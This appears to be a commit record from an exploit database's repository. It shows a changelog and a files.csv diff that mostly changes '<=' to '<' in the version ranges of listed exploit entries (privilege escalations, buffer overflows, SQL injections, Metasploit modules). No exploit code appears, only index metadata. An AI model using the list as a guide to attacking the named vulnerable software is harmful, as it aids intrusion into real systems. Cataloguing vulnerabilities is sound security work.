DB: 2017-01-26

7 new exploits OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow Inframail Advantage Server Edition 6.0 < 6.37 - (SMTP) Buffer Overflow Inframail Advantage Server Edition 6.0 < 6.37 - (FTP) Buffer Overflow Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service Blitzkrieg 2 < 1.21 - (Server/Client) Denial of Service Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1) DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC) DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC) DESlock+ <= 3.2.7 - Local Kernel Overflow (PoC) DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service (PoC) DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service (PoC) DESlock+ < 3.2.7 - Local Kernel Overflow (PoC) DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC) DESlock+ < 3.2.7 - (probe read) Local Kernel Denial of Service (PoC) ViPlay3 <= 3.00 - '.vpl' Local Stack Overflow (PoC) ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC) Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit) Microsoft Windows 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit) Adobe Flash - No Checks on Vector.<uint> Capacity Field Adobe Flash - 'uint' Capacity Field Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4) Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1) Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2) Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3) Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4) Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (1) X11R6 <= 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow X11R6 < 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (1) X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (2) X11R6 < 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (2) AtomixMP3 <= 2.3 - '.m3u' Buffer Overflow AtomixMP3 < 2.3 - '.m3u' Buffer Overflow Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Privilege Escalation (2) Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Privilege Escalation (1) Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Privilege Escalation (2) Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Privilege Escalation (1) DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC) DESlock+ <= 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit DESlock+ <= 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM Exploit DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC) DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit DESlock+ < 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM Exploit AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH) AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH) Linux Kernel 2.6.18 <= 2.6.18-20 - Privilege Escalation Linux Kernel 2.6.18 < 2.6.18-20 - Privilege Escalation Winamp 5.05<5.13 - '.ini' Local Stack Buffer Overflow (PoC) Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC) AhnLab V3 Internet Security 8.0 <= 1.2.0.4 - Privilege Escalation NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation ESTsoft ALYac Anti-Virus 1.5 <= 5.0.1.2 - Privilege Escalation ViRobot Desktop 5.5 and Server 3.5 <= 2008.8.1.1 - Privilege Escalation AhnLab V3 Internet Security 8.0 < 1.2.0.4 - Privilege Escalation NProtect Anti-Virus 2007 < 2010.5.11.1 - Privilege Escalation ESTsoft ALYac Anti-Virus 1.5 < 5.0.1.2 - Privilege Escalation ViRobot Desktop 5.5 and Server 3.5 < 2008.8.1.1 - Privilege Escalation DESlock+ <= 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit PolicyKit polkit-1 <= 0.101 - Linux Privilege Escalation PolicyKit polkit-1 < 0.101 - Linux Privilege Escalation Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1) Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1) Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit) Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit) Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1) Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1) Linux Kernel 2.6.0 <= 2.6.31 - 'pipe.c' Privilege Escalation (1) Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1) Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2) Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper.c' Privilege Escalation (2) OSSEC 2.7 <= 2.8.1 - 'diff' Command Privilege Escalation OSSEC 2.7 < 2.8.1 - 'diff' Command Privilege Escalation GNU Screen 4.5.0 - Privilege Escalation (PoC) GNU Screen 4.5.0 - Privilege Escalation Man-db 2.6.7.1 - Privilege Escalation (PoC) e107 <= 0.6172 - 'resetcore.php' SQL Injection e107 < 0.6172 - 'resetcore.php' SQL Injection Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2) Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2) Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter) Mercur Messaging 2005 < SP4 - IMAP Remote Exploit (Egghunter) Mercury/32 Mail Server 3.32<4.51 - SMTP Unauthenticated EIP Overwrite Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure Navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure NaviCopa Web Server 3.01 - Remote Buffer Overflow NaviCopa WebServer 3.01 - Remote Buffer Overflow Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Oracle Database 10.1.0.5 < 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Liquid XML Studio 2010 <= 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow TFTPD32 <= 2.21 - Long Filename Buffer Overflow (Metasploit) TFTPD32 < 2.21 - Long Filename Buffer Overflow (Metasploit) Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit) Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit) Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit) Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit) Exim4 <= 4.69 - string_format Function Heap Buffer Overflow (Metasploit) Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit) Mozilla Firefox 7 / 8 < 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit) Active Collab 'chat module' <= 2.3.8 - Remote PHP Code Injection (Metasploit) Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit) Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) Mozilla Firefox < 50.0.2 - nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution (Metasploit) Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit) Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit) Drupal 4.5.3 <= 4.6.1 - Comments PHP Injection Drupal 4.5.3 < 4.6.1 - Comments PHP Injection FCKEditor 2.0 <= 2.2 - 'FileManager connector.php' Arbitrary File Upload FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload RechnungsZentrale V2 <= 1.1.3 - Remote File Inclusion RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion RsGallery2 <= 1.11.2 - 'rsgallery.html.php' File Inclusion RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion Invision Power Board 2.1 <= 2.1.6 - SQL Injection (1) Invision Power Board 2.1 < 2.1.6 - SQL Injection (1) Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2) Invision Power Board 2.1 < 2.1.6 - SQL Injection (2) vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution vbPortal 3.0.2 < 3.6.0 b1 - 'cookie' Remote Code Execution Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution e107 < 0.75 - (GLOBALS Overwrite) Remote Code Execution Haberx 1.02 <= 1.1 - (tr) SQL Injection Haberx 1.02 < 1.1 - (tr) SQL Injection PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion PNPHPBB2 < 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion exV2 <= 2.0.4.3 - (sort) SQL Injection exV2 < 2.0.4.3 - (sort) SQL Injection exV2 <= 2.0.4.3 - extract() Remote Command Execution exV2 < 2.0.4.3 - extract() Remote Command Execution Kietu? <= 4.0.0b2 - 'hit.php' Remote File Inclusion Kietu? < 4.0.0b2 - 'hit.php' Remote File Inclusion Forum82 <= 2.5.2b - (repertorylevel) Multiple File Inclusion Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion e107 <= 0.75 - (e107language_e107cookie) Local File Inclusion e107 < 0.75 - (e107language_e107cookie) Local File Inclusion Mambo Component com_flyspray <= 1.0.1 - Remote File Disclosure Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure PNPHPBB2 <= 1.2 - 'index.php' SQL Injection PNPHPBB2 < 1.2 - 'index.php' SQL Injection e107 <= 0.7.8 - (photograph) Arbitrary File Upload e107 < 0.7.8 - (photograph) Arbitrary File Upload EVA-Web 1.1 <= 2.2 - 'index.php3' Remote File Inclusion EVA-Web 1.1 < 2.2 - 'index.php3' Remote File Inclusion PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection PNPHPBB2 < 1.2i - 'viewforum.php' SQL Injection WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion PNPHPBB2 < 1.2i - 'PHPEx' Parameter Local File Inclusion zKup CMS 2.0 <= 2.3 - Remote Add Admin zKup CMS 2.0 <= 2.3 - Arbitrary File Upload zKup CMS 2.0 < 2.3 - Remote Add Admin zKup CMS 2.0 < 2.3 - Arbitrary File Upload GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection GLLCTS2 < 4.2.4 - 'detail' Parameter SQL Injection PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection PHPHoo3 < 5.2.6 - 'viewCat' Parameter SQL Injection E-Store Kit-1 <= 2 PayPal Edition - 'pid' Parameter SQL Injection E-Store Kit-1 < 2 PayPal Edition - 'pid' Parameter SQL Injection e107 <= 0.7.11 - Arbitrary Variable Overwriting e107 < 0.7.11 - Arbitrary Variable Overwriting e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection e107 < 0.7.13 - 'usersettings.php' Blind SQL Injection VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection VideoScript 3.0 < 4.0.1.50 - Official Shell Injection VideoScript 3.0 < 4.1.5.55 - Unofficial Shell Injection IPNPro3 <= 1.44 - Admin Password Changing Exploit IPNPro3 < 1.44 - Admin Password Changing Exploit PNphpBB2 <= 1.2i - (ModName) Multiple Local File Inclusion PNPHPBB2 < 1.2i - (ModName) Multiple Local File Inclusion WEBalbum 2.4b - 'photo.php id' Blind SQL Injection WEBalbum 2.4b - 'id' Parameter Blind SQL Injection e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection e107 < 0.7.15 - (extended_user_fields) Blind SQL Injection Alqatari group 1.0 <= 5.0 - 'id' SQL Injection AlefMentor 2.0 <= 5.0 - 'id' SQL Injection Alqatari group 1.0 < 5.0 - 'id' SQL Injection AlefMentor 2.0 < 5.0 - 'id' SQL Injection 2DayBiz Matrimonial Script - smartresult.php SQL Injection 2DayBiz Matrimonial Script - 'smartresult.php' SQL Injection fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit) Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Execution (Metasploit) Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities Concrete5 < 5.4.2.1 - Multiple Vulnerabilities CaupoShop Pro (2.x / <= 3.70) Classic 3.01 - Local File Inclusion CaupoShop Pro (2.x < 3.70) Classic 3.01 - Local File Inclusion Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities Apache Struts2 < 2.3.1 - Multiple Vulnerabilities Ruslan Communications <Body>Builder - SQL Injection Ruslan Communications <Body>Builder - Authentication Bypass AllMyVisitors 0.x - info.inc.php Arbitrary Code Execution AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution MyBB - 'editpost.php posthash' SQL Injection MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection CoolForum 0.5/0.7/0.8 - register.php login Parameter SQL Injection CoolForum 0.5/0.7/0.8 - 'register.php' login Parameter SQL Injection MyBB - Multiple Cross-Site Scripting / SQL Injection MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injection 4homepages 4Images 1.7 - member.php Cross-Site Scripting 4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting 4Images 1.7.1 - member.php sessionid Parameter SQL Injection 4Images 1.7.1 - 'member.php' sessionid Parameter SQL Injection Alex DownloadEngine 1.4.1 - comments.php SQL Injection Alex DownloadEngine 1.4.1 - 'comments.php' SQL Injection Album Photo Sans Nom 1.6 - Getimg.php Remote File Inclusion Album Photo Sans Nom 1.6 - 'Getimg.php' Remote File Inclusion 4Images 1.7 - details.php Cross-Site Scripting 4Images 1.7 - 'details.php' Cross-Site Scripting 212Cafe Guestbook 4.00 - show.php Cross-Site Scripting 212Cafe Guestbook 4.00 - 'show.php' Cross-Site Scripting 2z Project 0.9.5 - rating.php Cross-Site Scripting 2z Project 0.9.5 - 'rating.php' Cross-Site Scripting Openads (PHPAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion 212Cafe WebBoard 6.30 - Read.php SQL Injection 212Cafe WebBoard 6.30 - 'Read.php' SQL Injection PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection PHP-Nuke Advertising Module 0.9 - 'modules.php' SQL Injection Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (1) Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (1) Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (2) Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (2) ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management Joomla! - 'redirect.php' SQL Injection Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection Plone - 'in_portal.py' <= 4.1.3 Session Hijacking Plone - 'in_portal.py' < 4.1.3 Session Hijacking Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities Skybox Platform <= 7.0.611 - Multiple Vulnerabilities Skybox Platform < 7.0.611 - Multiple Vulnerabilities SOLIDserver <= 5.0.4 - Local File Inclusion SOLIDserver < 5.0.4 - Local File Inclusion WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities Movie Portal Script 7.36 - Multiple Vulnerabilities Joomla! < 2.5.2 - Admin Creation Joomla! < 3.6.4 - Admin TakeOver
2017-01-26 05:01:18 +00:00 · 2017-01-26 05:01:18 +00:00 · 45360ed27c
commit 45360ed27c
parent 763b417a35
8 changed files with 991 additions and 134 deletions
--- a/files.csv
+++ b/files.csv
@ -18,7 +18,7 @@ id,file,description,date,author,platform,type,port
 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
 113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0
-146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
+146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0
 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
@ -212,8 +212,8 @@ id,file,description,date,author,platform,type,port
 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",windows,dos,0
 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - Denial of Service",2005-06-26,"Reed Arvin",windows,dos,0
 1164,platforms/windows/dos/1164.pl,"BusinessMail Server 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",windows,dos,0
-1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0
-1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0
+1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0
+1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 < 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0
 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0
 1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos,0
 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0
@ -242,7 +242,7 @@ id,file,description,date,author,platform,type,port
 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos,0
 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0
 1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0
-1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0
+1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 < 1.21 - (Server/Client) Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0
 1283,platforms/windows/dos/1283.c,"FlatFrag 0.3 - Buffer Overflow / Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0
 1284,platforms/windows/dos/1284.c,"Glider collectn kill 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0
 1285,platforms/windows/dos/1285.c,"Scorched 3D 39.1 - Multiple Vulnerabilities (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0
@ -283,7 +283,7 @@ id,file,description,date,author,platform,type,port
 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0
 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0
 1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
-1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
+1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0
 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0
@ -694,7 +694,7 @@ id,file,description,date,author,platform,type,port
 5086,platforms/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,windows,dos,0
 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffiÃ©",windows,dos,0
 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos,0
-5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0
+5142,platforms/windows/dos/5142.c,"DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0
 5151,platforms/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos,0
 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,multiple,dos,0
 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0
@ -794,9 +794,9 @@ id,file,description,date,author,platform,type,port
 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit)",2008-09-17,"belay tows",windows,dos,0
 6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,php,dos,0
 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() - Remote Denial of Service",2008-09-19,"Jeremy Brown",linux,dos,0
-6496,platforms/windows/dos/6496.c,"DESlock+ <= 3.2.7 - Local Kernel Overflow (PoC)",2008-09-20,mu-b,windows,dos,0
-6497,platforms/windows/dos/6497.c,"DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0
-6498,platforms/windows/dos/6498.c,"DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0
+6496,platforms/windows/dos/6496.c,"DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)",2008-09-20,mu-b,windows,dos,0
+6497,platforms/windows/dos/6497.c,"DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0
+6498,platforms/windows/dos/6498.c,"DESlock+ < 3.2.7 - (probe read) Local Kernel Denial of Service (PoC)",2008-09-20,mu-b,windows,dos,0
 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 - 'vdlptokn.sys' Local Denial of Service",2008-09-21,"NT Internals",windows,dos,0
 6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
 6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0
@ -1047,7 +1047,7 @@ id,file,description,date,author,platform,type,port
 8611,platforms/windows/dos/8611.pl,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)",2009-05-05,"Load 99%",windows,dos,0
 8617,platforms/windows/dos/8617.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow (PoC)",2009-05-05,Cyber-Zone,windows,dos,0
 8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos,0
-8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - '.vpl' Local Stack Overflow (PoC)",2009-05-08,LiquidWorm,windows,dos,0
